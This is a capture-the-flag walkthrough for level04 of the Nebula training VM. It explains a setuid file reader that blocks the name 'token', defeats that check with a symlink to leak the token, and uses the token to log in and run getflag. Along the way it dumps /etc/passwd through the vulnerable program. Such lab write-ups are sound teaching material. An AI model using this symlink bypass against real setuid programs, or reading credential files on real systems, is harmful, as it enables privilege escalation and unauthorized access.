Nebula level04 Walkthrough

Nebula is a vulnerable virtual machine which has a variety of weaknesses and vulnerabilities in a Linux system.

Description of level04
“This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :) To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.”

Breakdown of the above program
Line 13–16

Prints the usage information if no argument is specifies apart from the file.

level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]

Line 18–21
Checks if the second argument is “token” and exits if so.

level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'

Line 23–26
open is a system call that is used to open a new file and obtain its file descriptor.

/*
int open(const char *path, int oflags);
int open(const char *path, int oflags, mode_t mode);
const char *path -> The relative or absolute path to the file that is to be opened.
int oflags -> A bitwise 'or' separated list of values that determine the method in which the file is to be opened (whether it should be read only, read/write, whether it should be cleared when opened, etc).
mode_t mode -> A bitwise 'or' separated list of values that determine the permissions of the file if it is created.
return value -> Returns the file descriptor for the new file. The file descriptor returned is always the smallest integer greater than zero that is still available. If a negative value is returned, then there was an error opening the file.
*/
level04@nebula:/home/flag04$ ./flag04 non_existent
flag04: Unable to open non_existent: No such file or directory

Line 28
read is a system call used to read data into a buffer.

/*
ssize_t read(int fildes, void *buf, size_t nbytes);
int fildes -> The file descriptor of where to read the input. You can either use a file descriptor obtained from the open system call, or you can use 0, 1, or 2, to refer to standard input, standard output, or standard error, respectively.
const void *buf -> A character array where the read content will be stored.
size_t nbytes -> The number of bytes to read before truncating the data. If the data to be read is smaller than nbytes, all data is saved in the buffer.
return value -> Returns the number of bytes that were read. If value is negative, then the system call returned an error.
*/
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
nebula:x:1000:1000:nebula,,,:/home/nebula:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
level00:x:1001:1001::/home/level00:/bin/sh
flag00:x:999:999::/home/flag0

Line 34
write is a system call that is used to write data out of a buffer.

/*
ssize_t write(int fildes, const void *buf, size_t nbytes);
int fildes -> The file descriptor of where to write the output. You can either use a file descriptor obtained from the open system call, or you can use 0, 1, or 2, to refer to standard input, standard output, or standard error, respectively.
const void *buf -> A null terminated character string of the content to write.
size_t nbytes -> The number of bytes to write. If smaller than the provided buffer, the output is truncated.
return value -> Returns the number of bytes that were written. If value is negative, then the system call returned an error.
*/

Inspecting the program

level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ ./flag04 test
flag04: Unable to open test: No such file or directory
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
nebula:x:1000:1000:nebula,,,:/home/nebula:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
level00:x:1001:1001::/home/level00:/bin/sh
flag00:x:999:999::/home/flag0
level04@nebula:/home/flag04$ ./flag04 token
You may not access ‘token’

Game Plan

  • Create a symlink of the token.
level04@nebula:~$ ln -s /home/flag04/token key
  • Execute flag04 with key as the parameter
level04@nebula:~$ /home/flag04/flag04 key
06508b5e-8909-4f38-b630-fdb148a848a2
  • Login to flag04 account with the above obtained string
➜  ~ ssh flag04@192.168.1.7
      _   __     __          __
/ | / /__ / /_ __ __/ /___ _
/ |/ / _ \/ __ \/ / / / / __ `/
/ /| / __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
flag04@192.168.1.7's password:
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
flag04@nebula:~$ getflag
You have successfully executed getflag on a target account

Happy Hacking !!!